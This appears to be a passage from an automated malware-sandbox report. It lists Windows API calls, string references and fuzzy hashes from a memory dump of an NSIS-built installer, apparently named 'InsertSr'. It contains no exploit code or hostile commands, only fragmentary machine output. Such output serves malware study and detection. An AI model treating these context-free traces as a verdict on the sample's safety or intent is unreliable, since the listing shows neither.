                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                            • String ID: HideWindow
                                                                            • API String ID: 1249568736-780306582
                                                                            APIs
                                                                            • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                            • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                            Similarity
                                                                            • API ID: Global$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 3394109436-0
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404993
• GetDlgItem.USER32(?,00000408), ref: 004049A0
• GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
• LoadBitmapW.USER32(0000006E), ref: 00404A02
• SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
• DeleteObject.GDI32(?), ref: 00404A79
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
• GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
• ShowWindow.USER32(?,00000005), ref: 00404BCF
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
• ImageList_Destroy.COMCTL32(?), ref: 00404D9C
• GlobalFree.KERNEL32(?), ref: 00404DAC
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
• SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
• ShowWindow.USER32(?,00000000), ref: 00404F49
• GetDlgItem.USER32(?,000003FE), ref: 00404F54
• ShowWindow.USER32(00000000), ref: 00404F5B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $ @$M$N
• API String ID: 1638840714-3479655940
APIs
• GetDlgItem.USER32(?,000003F0), ref: 004044F9
• IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
• GetDlgItem.USER32(?,000003FB), ref: 00404527
• GetAsyncKeyState.USER32(00000010), ref: 0040452E
• GetDlgItem.USER32(?,000003F0), ref: 00404543
• ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
• SetWindowTextW.USER32(?,?), ref: 00404583
• SHBrowseForFolderW.SHELL32(?), ref: 0040463D
• lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
• lstrcatW.KERNEL32(?,00462540), ref: 00404686
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
• CoTaskMemFree.OLE32(00000000), ref: 00404648
  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                            • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                            • String ID: 82D$@%F$@rD$A
                                                                            • API String ID: 3347642858-1086125096
                                                                            • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                            • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                            • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                            • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                            • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                            • API String ID: 1916479912-1189179171
                                                                            • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                            • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                            • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                            • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                            APIs
                                                                            • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                            • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                            • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                            • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                            • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                            • FindClose.KERNEL32(?), ref: 00406E33
                                                                            Strings
                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                            • \*.*, xrefs: 00406D03
                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                            • API String ID: 2035342205-3294556389
                                                                            • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                            • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                            • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                            • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                            APIs
                                                                            • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                            • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                            • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                            • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                            • API String ID: 3581403547-784952888
                                                                            • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                            • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                            • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                            Strings
                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance
                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                            • API String ID: 542301482-1377821865
                                                                            • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                            • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                            • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                            • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                            • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                            • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                            • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                              • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                            • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                            • API String ID: 20674999-2124804629
                                                                            • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                            • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                            • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                            • GetSysColor.USER32(?), ref: 004041AF
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                            • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                              • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                              • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                            • SendMessageW.USER32(00000000), ref: 00404251
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                            • SetCursor.USER32(00000000), ref: 004042D2
                                                                            • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                            • SetCursor.USER32(00000000), ref: 004042F6
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                            • String ID: @%F$N$open
                                                                            • API String ID: 3928313111-3849437375
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                            • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                              • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
